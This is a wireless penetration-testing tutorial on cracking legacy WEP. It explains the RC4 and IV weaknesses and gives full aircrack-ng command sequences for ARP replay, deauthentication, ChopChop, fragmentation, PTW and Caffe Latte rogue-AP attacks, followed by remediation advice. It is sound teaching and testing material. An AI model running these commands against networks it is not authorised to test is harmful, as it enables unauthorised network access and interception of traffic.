WEP Cracking (Legacy)

Exploitation
🌱 Beginner
T1040 T1557

WEP (Wired Equivalent Privacy) was the original 802.11 encryption standard, ratified in 1999 and officially deprecated in 2004 after fatal cryptographic weaknesses were discovered. Despite being obsolete, WEP still appears on legacy industrial controllers, older IoT devices, and neglected network segments. Understanding WEP attacks provides foundational knowledge of wireless cryptanalysis.

Deprecated Protocol

WEP is completely broken and can be cracked in under 5 minutes with sufficient traffic. Any network still running WEP should be immediately upgraded to WPA2 or WPA3. This guide exists for legacy system testing and educational purposes only.

📑 Table of Contents

Why WEP Is Broken

WEP uses the RC4 stream cipher with a 24-bit Initialization Vector (IV). The fundamental flaws:

Vulnerability Technical Detail Impact
IV Collision 24-bit IV = 16.7M possible values; reuse guaranteed after ~5,000 packets (birthday paradox) Same keystream reused → XOR of two plaintexts leaked
Weak IVs (FMS) Certain IVs correlate with key bytes due to RC4 key scheduling ~9,000 weak IVs reveal full key (Fluhrer-Mantin-Shamir, 2001)
No Replay Protection No sequence numbering or nonce binding ARP packets can be replayed to generate unlimited IVs
CRC-32 Integrity Linear CRC-32 checksum (ICV) instead of cryptographic MAC Packets can be modified without detection (bit-flipping attacks)
Static Key Same shared key used by all clients; no per-session keys One crack = all clients compromised

Historical Timeline

1999: WEP ratified in IEEE 802.11 standard
2001: FMS attack published (Fluhrer, Mantin, Shamir)
2004: IEEE 802.11i (WPA2) ratified; WEP deprecated
2007: PTW attack reduces required IVs to ~40,000 (under 60 seconds)
2018: Wi-Fi Alliance mandates WPA3 certification

Basic IV + ARP Replay Attack

The classic WEP attack: capture IVs by replaying ARP packets to generate traffic, then crack once enough unique IVs are collected. This is the most reliable method against any WEP network.

Step 1: Start capture on the target channel.

01-start-capture.sh
bash 
# Start capturing IVs (-w writes output, -c locks channel)
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wep_capture wlan0mon

# Watch the #Data column — you need 20,000+ IVs for FMS/KoreK
# or ~40,000+ for PTW (faster statistical attack)
# Start capturing IVs (-w writes output, -c locks channel)
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wep_capture wlan0mon

# Watch the #Data column — you need 20,000+ IVs for FMS/KoreK
# or ~40,000+ for PTW (faster statistical attack)

Step 2: Fake-authenticate with the AP so it accepts your frames.

02-fake-auth.sh
bash 
# -1 = fake auth, 0 = reassociation timing, -a = AP BSSID
sudo aireplay-ng -1 0 -a AA:BB:CC:DD:EE:FF wlan0mon

# If you see "Association successful" you're in
# Some APs require MAC filtering — spoof a legitimate client MAC:
sudo aireplay-ng -1 0 -e "TargetSSID" -a AA:BB:CC:DD:EE:FF -h 11:22:33:44:55:66 wlan0mon
# -1 = fake auth, 0 = reassociation timing, -a = AP BSSID
sudo aireplay-ng -1 0 -a AA:BB:CC:DD:EE:FF wlan0mon

# If you see "Association successful" you're in
# Some APs require MAC filtering — spoof a legitimate client MAC:
sudo aireplay-ng -1 0 -e "TargetSSID" -a AA:BB:CC:DD:EE:FF -h 11:22:33:44:55:66 wlan0mon

Step 3: ARP replay to generate a flood of IVs. Each replayed ARP generates a new IV.

03-arp-replay.sh
bash 
# -3 = ARP request replay attack
sudo aireplay-ng -3 -b AA:BB:CC:DD:EE:FF wlan0mon

# Output shows: "Read XXXX packets, got YYYY ARP requests, sent ZZZZ packets"
# If no ARP packets appear, try deauthing a connected client:
sudo aireplay-ng -0 1 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:00:11 wlan0mon
# -3 = ARP request replay attack
sudo aireplay-ng -3 -b AA:BB:CC:DD:EE:FF wlan0mon

# Output shows: "Read XXXX packets, got YYYY ARP requests, sent ZZZZ packets"
# If no ARP packets appear, try deauthing a connected client:
sudo aireplay-ng -0 1 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:00:11 wlan0mon

Step 4: Crack the WEP key once enough IVs are collected.

04-crack-wep.sh
bash 
# PTW attack (default, fastest — works with ~40,000 IVs)
aircrack-ng wep_capture-01.cap

# Force FMS/KoreK attack (works with fewer unique IVs)
aircrack-ng -K wep_capture-01.cap

# Specify key length if known (64-bit or 128-bit)
aircrack-ng -n 128 wep_capture-01.cap

# Successful output:
#   KEY FOUND! [ DE:AD:BE:EF:CA ]
#   Decrypted correctly: 100%
# PTW attack (default, fastest — works with ~40,000 IVs)
aircrack-ng wep_capture-01.cap

# Force FMS/KoreK attack (works with fewer unique IVs)
aircrack-ng -K wep_capture-01.cap

# Specify key length if known (64-bit or 128-bit)
aircrack-ng -n 128 wep_capture-01.cap

# Successful output:
#   KEY FOUND! [ DE:AD:BE:EF:CA ]
#   Decrypted correctly: 100%

ChopChop Attack

The ChopChop attack (KoreK, 2004) decrypts a WEP packet one byte at a time by exploiting the linear CRC-32 checksum. It doesn't directly recover the WEP key but produces a PRGA (Pseudo Random Generation Algorithm) keystream file that can be used to forge packets and generate traffic.

05-chopchop.sh
bash 
# -4 = ChopChop attack, -b = target BSSID
sudo aireplay-ng -4 -b AA:BB:CC:DD:EE:FF wlan0mon

# When prompted "Use this packet?" answer 'y'
# Attack chops 1 byte at a time from the encrypted packet
# Output: replay_dec-XXXX.xor (PRGA keystream file)

# Use the keystream to forge an ARP packet
sudo packetforge-ng -0 -a AA:BB:CC:DD:EE:FF -h 11:22:33:44:55:66 \
  -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-*.xor -w forged-arp.cap

# Inject the forged ARP to generate IVs
sudo aireplay-ng -2 -r forged-arp.cap wlan0mon
# -4 = ChopChop attack, -b = target BSSID
sudo aireplay-ng -4 -b AA:BB:CC:DD:EE:FF wlan0mon

# When prompted "Use this packet?" answer 'y'
# Attack chops 1 byte at a time from the encrypted packet
# Output: replay_dec-XXXX.xor (PRGA keystream file)

# Use the keystream to forge an ARP packet
sudo packetforge-ng -0 -a AA:BB:CC:DD:EE:FF -h 11:22:33:44:55:66 \
  -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-*.xor -w forged-arp.cap

# Inject the forged ARP to generate IVs
sudo aireplay-ng -2 -r forged-arp.cap wlan0mon

When to Use ChopChop

ChopChop is useful when ARP replay fails (no ARP traffic on the network). It works even on quiet networks by decrypting any captured data packet. The downside is it's slower — each byte takes several hundred packets to decrypt.

Fragmentation Attack

The fragmentation attack obtains 1,500 bytes of PRGA keystream from a single data packet. This is faster than ChopChop and enough keystream to forge full-sized packets.

06-fragmentation.sh
bash 
# -5 = Fragmentation attack
sudo aireplay-ng -5 -b AA:BB:CC:DD:EE:FF wlan0mon

# Answer 'y' to use the captured packet
# Output: fragment-XXXX.xor (1500 bytes of keystream)

# Forge an ARP packet with the keystream
sudo packetforge-ng -0 -a AA:BB:CC:DD:EE:FF -h 11:22:33:44:55:66 \
  -k 255.255.255.255 -l 255.255.255.255 -y fragment-*.xor -w forged-arp.cap

# Inject forged ARP → generates IVs → crack with aircrack-ng
sudo aireplay-ng -2 -r forged-arp.cap wlan0mon
# -5 = Fragmentation attack
sudo aireplay-ng -5 -b AA:BB:CC:DD:EE:FF wlan0mon

# Answer 'y' to use the captured packet
# Output: fragment-XXXX.xor (1500 bytes of keystream)

# Forge an ARP packet with the keystream
sudo packetforge-ng -0 -a AA:BB:CC:DD:EE:FF -h 11:22:33:44:55:66 \
  -k 255.255.255.255 -l 255.255.255.255 -y fragment-*.xor -w forged-arp.cap

# Inject forged ARP → generates IVs → crack with aircrack-ng
sudo aireplay-ng -2 -r forged-arp.cap wlan0mon

PTW Attack (Fast Crack)

The Pyshkin-Tews-Weinmann (PTW, 2007) attack is the fastest WEP crack method. It uses a statistical approach on ARP packets and needs only ~40,000 IVs for a 104-bit key — cracking in under 60 seconds on a modern laptop. This is aircrack-ng's default mode.

07-ptw-attack.sh
bash 
# PTW is the default attack in aircrack-ng
# Requires ARP packets specifically (not just any IVs)
aircrack-ng -z wep_capture-01.cap

# PTW works best with ARP traffic → combine with ARP replay
# Full automated workflow:
# Terminal 1: sudo airodump-ng -c 6 --bssid AP_MAC -w wep wlan0mon
# Terminal 2: sudo aireplay-ng -1 0 -a AP_MAC wlan0mon
# Terminal 3: sudo aireplay-ng -3 -b AP_MAC wlan0mon
# Terminal 4: aircrack-ng -z wep-01.cap  (runs continuously, retries every 5000 IVs)

# For 64-bit WEP keys: ~20,000 IVs sufficient
# For 128-bit WEP keys: ~40,000 IVs sufficient
# PTW is the default attack in aircrack-ng
# Requires ARP packets specifically (not just any IVs)
aircrack-ng -z wep_capture-01.cap

# PTW works best with ARP traffic → combine with ARP replay
# Full automated workflow:
# Terminal 1: sudo airodump-ng -c 6 --bssid AP_MAC -w wep wlan0mon
# Terminal 2: sudo aireplay-ng -1 0 -a AP_MAC wlan0mon
# Terminal 3: sudo aireplay-ng -3 -b AP_MAC wlan0mon
# Terminal 4: aircrack-ng -z wep-01.cap  (runs continuously, retries every 5000 IVs)

# For 64-bit WEP keys: ~20,000 IVs sufficient
# For 128-bit WEP keys: ~40,000 IVs sufficient

Caffe Latte Attack

The Caffe Latte attack (2007) recovers a WEP key from a client that is not connected to any AP. If a laptop has a saved WEP network, it will probe for it — and you can respond, trick it into generating encrypted traffic, and crack the key without the original AP being present.

08-caffe-latte.sh
bash 
# Create a fake AP matching the client's saved WEP network
# The client auto-connects and generates GRATUITOUS ARP packets
sudo airbase-ng -c 6 -e "TargetSSID" -W 1 wlan0mon

# In another terminal: capture the IV traffic
sudo airodump-ng -c 6 --bssid <airbase_MAC> -w caffe wlan0mon

# The client sends ARP requests for its remembered IP
# Bit-flip these into ARP replies → generate more IVs

# Crack when enough IVs collected
aircrack-ng caffe-01.cap
# Create a fake AP matching the client's saved WEP network
# The client auto-connects and generates GRATUITOUS ARP packets
sudo airbase-ng -c 6 -e "TargetSSID" -W 1 wlan0mon

# In another terminal: capture the IV traffic
sudo airodump-ng -c 6 --bssid <airbase_MAC> -w caffe wlan0mon

# The client sends ARP requests for its remembered IP
# Bit-flip these into ARP replies → generate more IVs

# Crack when enough IVs collected
aircrack-ng caffe-01.cap

Attack Without an AP

Caffe Latte is powerful for testing if corporate laptops have saved WEP profiles. Common in airport/hotel scenarios where legacy networks were once configured. Modern OSes (Windows 10+, macOS 11+) no longer auto-connect to WEP networks by default.

Where WEP Still Lives

Despite being deprecated for two decades, WEP persists in specific environments:

🏭 Industrial / SCADA

Legacy PLCs and HMIs with embedded 802.11b radios that cannot be firmware-updated. Common in manufacturing plants with 20+ year equipment lifecycles.

🏥 Medical Devices

Older infusion pumps, patient monitors, and PACS systems. FDA certification makes firmware updates extremely slow.

🎮 Gaming / Retro

Nintendo DS, original PSP, and other legacy gaming consoles with Wi-Fi only support WEP. Hobbyist networks still use it.

📡 Wireless Bridges

Point-to-point wireless links in older building-to-building setups. Often forgotten and unmaintained.

Defense & Remediation

If WEP is discovered during a penetration test, the remediation is straightforward:

  • Upgrade to WPA2-AES immediately — there is no way to secure WEP
  • Isolate legacy devices that cannot support WPA2 on a dedicated VLAN with strict firewall rules
  • Wrap with VPN if device must use WEP — IPsec or WireGuard tunnel over the WEP link
  • Audit saved profiles on corporate laptops for stored WEP networks (Caffe Latte risk)
  • Monitor for WEP APs using WIDS/WIPS — any WEP beacon should trigger an alert
🎯

WEP Cracking Practice

Practice WEP key recovery using IV collection, PTW, and fragmentation attacks in a safe lab.

🔧
WEP Cracking Lab Custom Lab easy
ARP replayPTW attackfragmentationairdecap-ng
🏠
WiFi Hacking 101 TryHackMe easy
WEP key crackingfake authIV collection
Open Lab
Need help setting up? Check our Lab Setup Guide →
06. Deauth Attacks 08. WPA3 & Wi-Fi 6

Related Topics

Wireless Pentesting

Wireless Tools

Encryption Cheatsheet